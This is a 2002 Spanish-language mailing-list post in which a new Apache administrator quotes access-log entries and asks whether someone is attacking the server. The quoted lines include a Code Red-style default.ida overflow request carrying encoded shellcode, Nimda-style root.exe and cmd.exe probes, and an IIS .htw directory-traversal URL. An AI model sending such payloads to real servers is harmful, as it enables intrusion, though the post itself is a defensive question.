[Posible OT]Mas apache

Fri, 10 May 2002 10:13:51 -0500 

Hola a todos: 
Tengo el apache 1.3.24 instalado desde hace poco (para probarlo) y ayer 
mirando el acces.log me encontre con esto:
218.25.47.223 - - [09/May/2002:01:31:06 +0200] "GET 
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 
400 331 "-" "-"

y con esto:

217.216.124.199 - - [09/May/2002:15:26:26 +0200] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:29 +0200] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 287 "-" "-"
217.216.124.199 - - [09/May/2002:15:26:36 +0200] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"

Buscando exploits y eso me encontre con este (aunque solo es de IIS):

http://ip/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiwebhitsFile=/../..
/./..test.txt&CiRestriction=none&CiHiliteType=Full

Que mas o menos se parece la pregunta es: ¿Alguien esta intentado algo 
raro?¿o es mejor que deje las bebidas de alta graduacion:-)?
Si alguien me pudiera aclarar esto ya digo que tengo el server desde hace 
poco y lo puse para probar

Gracias y perdonad por el posible [OT] y por lo largo del texto :-)
-- 
____________________________________
*                                                     *
*   web personal: http://go.to/nuestra.web     *
*   Linux user #255925                    *
*   Debian/GNU                                *
*    Kernel 2.2.18                                    *
*___________________________________*


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Responder a